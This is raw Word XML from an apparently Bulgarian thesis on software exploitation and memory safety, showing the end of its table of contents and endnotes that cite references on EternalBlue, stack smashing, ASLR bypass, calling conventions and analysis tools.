                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540817 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>80</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540818" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Приложение 3 - Справочник на използваните регистри</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540818 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>82</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540819" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">Приложение 4 - прототип </w:t>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="bg-BG"/>
              </w:rPr>
              <w:t>на Фигура 3-6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540819 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>83</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540820" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Прилож</w:t>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="bg-BG"/>
              </w:rPr>
              <w:t>е</w:t>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ние 5 - Сорс код + CD</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540820 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>84</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00326004" w:rsidRDefault="00326004">
          <w:r w:rsidRPr="00875CB1">
            <w:rPr>
              <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia"/>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w:rsidR="00326004" w:rsidRDefault="00326004" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="00112660" w:rsidRDefault="006150B9" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="006150B9" w:rsidRPr="00112660" w:rsidSect="00EF4844">
      <w:endnotePr>
        <w:numFmt w:val="decimal"/>
      </w:endnotePr>
      <w:pgSz w:w="11909" w:h="16834"/>
      <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440"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2214" w:rsidRDefault="00A02214">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00A02214" w:rsidRDefault="00A02214">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:id="1">
    <w:p w:rsidR="00875CB1" w:rsidRPr="005E60F7" w:rsidRDefault="00875CB1" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:endnoteRef/>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t xml:space="preserve"> An NSA-derived ransomware worm is shutting down computers worldwide, </w:t>
      </w:r>
      <w:hyperlink r:id="rId1">
        <w:r w:rsidRPr="005E60F7">
          <w:t>https://arstechnica.com/information-technology/2017/05/an-nsa-derived-ransomware-worm-is-shutting-down-computers-worldwide/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005E60F7">
        <w:t>, последно посещение 25.02.2019</w:t>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:id="2">
    <w:p w:rsidR="00875CB1" w:rsidRPr="005E60F7" w:rsidRDefault="00875CB1" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:endnoteRef/>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t xml:space="preserve"> Cisco 2018 Annual Cybersecurity report</w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2">
        <w:r w:rsidRPr="005E60F7">
          <w:t>https://www.cisco.com/c/dam/m/hu_hu/campaigns/security-hub/pdf/acr-2018.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
  </w:endnote>
  <w:endnote w:id="3">
    <w:p w:rsidR="00875CB1" w:rsidRPr="005E60F7" w:rsidRDefault="00875CB1" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:endnoteRef/>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t xml:space="preserve"> EternalBlue – Everything There Is To Know,  </w:t>
      </w:r>
      <w:hyperlink r:id="rId3">
        <w:r w:rsidRPr="005E60F7">
          <w:t>https://research.checkpoint.com/eternalblue-everything-know/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005E60F7">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:id="4">
    <w:p w:rsidR="00875CB1" w:rsidRPr="005E60F7" w:rsidRDefault="00875CB1" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:endnoteRef/>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t xml:space="preserve"> Smashing The Stack For Fun And Profit</w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t>http://phrack.org/issues/49/14.html</w:t>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:id="5">
    <w:p w:rsidR="00875CB1" w:rsidRPr="005E60F7" w:rsidRDefault="00875CB1" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:endnoteRef/>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t xml:space="preserve"> Special sections in Linux binaries, https://lwn.net/Articles/531148/</w:t>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:id="6">
    <w:p w:rsidR="00875CB1" w:rsidRPr="005E60F7" w:rsidRDefault="00875CB1" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:endnoteRef/>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t xml:space="preserve"> System V ABI, </w:t>
      </w:r>
      <w:hyperlink r:id="rId4">
        <w:r w:rsidRPr="005E60F7">
          <w:t>https://wiki.osdev.org/System_V_ABI</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
  </w:endnote>
  <w:endnote w:id="7">
    <w:p w:rsidR="00875CB1" w:rsidRPr="005E60F7" w:rsidRDefault="00875CB1" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:endnoteRef/>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t xml:space="preserve"> System V Application Binary Interface, https://refspecs.linuxfoundation.org/elf/x86_64-abi-0.99.pdf</w:t>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:id="8">
    <w:p w:rsidR="00875CB1" w:rsidRPr="005E60F7" w:rsidRDefault="00875CB1" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:endnoteRef/>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t xml:space="preserve"> SO/IEC 9899:TC3,</w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId5">
        <w:r w:rsidRPr="005E60F7">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>http://www.open-std.org/jtc1/sc22/wg14/www/docs/n1256.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
  </w:endnote>
  <w:endnote w:id="9">
    <w:p w:rsidR="00875CB1" w:rsidRPr="005E60F7" w:rsidRDefault="00875CB1" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:endnoteRef/>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t xml:space="preserve"> The Go low-level calling convention on x86-64, https://science.raphael.poss.name/go-calling-convention-x86-64.html</w:t>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:id="10">
    <w:p w:rsidR="00875CB1" w:rsidRPr="005E60F7" w:rsidRDefault="00875CB1" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:endnoteRef/>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t xml:space="preserve"> Lists of instruction latencies, throughputs and micro-operation breakdowns for Intel, AMD and VIA CPUs, https://www.agner.org/optimize/instruction_tables.pdf</w:t>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:id="11">
    <w:p w:rsidR="00875CB1" w:rsidRPr="005E60F7" w:rsidRDefault="00875CB1" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:endnoteRef/>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t xml:space="preserve"> Clang Static Analyzer</w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t>https://clang-analyzer.llvm.org/</w:t>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:id="12">
    <w:p w:rsidR="00875CB1" w:rsidRPr="005E60F7" w:rsidRDefault="00875CB1" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:endnoteRef/>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Valgrind, </w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t>http://valgrind.org/</w:t>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:id="13">
    <w:p w:rsidR="00875CB1" w:rsidRPr="005E60F7" w:rsidRDefault="00875CB1" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:endnoteRef/>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t xml:space="preserve"> Bypassing ASLR by predicting a process’ randomization, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00875CB1" w:rsidRPr="005E60F7" w:rsidRDefault="00A02214" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:hyperlink r:id="rId6">
        <w:r w:rsidR="00875CB1" w:rsidRPr="005E60F7">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.blackhat.com/presentations/bh-europe-09/Fritsch/Blackhat-Europe-2009-Fritsch-Bypassing-aslr-whitepaper.pdf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00875CB1" w:rsidRPr="005E60F7">
        <w:t xml:space="preserve"> (paper)</w:t>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:id="14">
    <w:p w:rsidR="00875CB1" w:rsidRPr="005E60F7" w:rsidRDefault="00875CB1" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:endnoteRef/>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t xml:space="preserve"> Python Security Documentation</w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t>Release 0.0</w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t>https://media.readthedocs.org/pdf/python-security/latest/python-security.pdf</w:t>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:id="15">
    <w:p w:rsidR="00875CB1" w:rsidRPr="005E60F7" w:rsidRDefault="00875CB1" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:endnoteRef/>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t xml:space="preserve"> Harry Sintonen, https://sintonen.fi/advisories/scp-client-multiple-vulnerabilities.txt</w:t>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:id="16">
    <w:p w:rsidR="00875CB1" w:rsidRPr="005E60F7" w:rsidRDefault="00875CB1" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:endnoteRef/>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t xml:space="preserve"> Local bypass of Linux ASLR through /proc information leaks</w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t xml:space="preserve"> h</w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ttps://blog.cr0.org/2009/04/local-bypass-of-linux-aslr-through-proc.html</w:t>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:id="17">
    <w:p w:rsidR="00875CB1" w:rsidRPr="005E60F7" w:rsidRDefault="00875CB1" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:endnoteRef/>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t xml:space="preserve"> Smashing the stack in 2011</w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, https://paulmakowski.wordpress.com/2011/01/25/smashing-the-stack-in-2011/</w:t>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:id="18">
    <w:p w:rsidR="00875CB1" w:rsidRPr="005E60F7" w:rsidRDefault="00875CB1" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:endnoteRef/>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Stuxnet, </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="005E60F7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:u w:val="none"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://en.wikipedia.org/wiki/Stuxnet</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>, последно посетен 15.01.2019</w:t>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:id="19">
    <w:p w:rsidR="00875CB1" w:rsidRPr="005E60F7" w:rsidRDefault="00875CB1" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:endnoteRef/>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve">Цокев А., Етично хакерство, </w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ISBN 978-619-7382-00-6</w:t>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:id="20">
    <w:p w:rsidR="00875CB1" w:rsidRPr="005E60F7" w:rsidRDefault="00875CB1" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:endnoteRef/>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Market share reports, </w:t>
      </w:r>
      <w:hyperlink r:id="rId8">
        <w:r w:rsidRPr="005E60F7">
          <w:t>https://netmarketshare.com/operating-system-market-share.aspx</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>януари 2019</w:t>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:id="21">
    <w:p w:rsidR="00875CB1" w:rsidRPr="005E60F7" w:rsidRDefault="00875CB1" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:endnoteRef/>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">System V ABI, </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="005E60F7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>https://wiki.osdev.org/System_V_ABI</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>, последно посетен 22.01.2019</w:t>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:id="22">
    <w:p w:rsidR="00875CB1" w:rsidRPr="005E60F7" w:rsidRDefault="00875CB1" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:endnoteRef/>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t xml:space="preserve"> Linux System Call Table for x86 64</w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t>http://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/</w:t>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:id="23">
    <w:p w:rsidR="00875CB1" w:rsidRPr="005E60F7" w:rsidRDefault="00875CB1" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
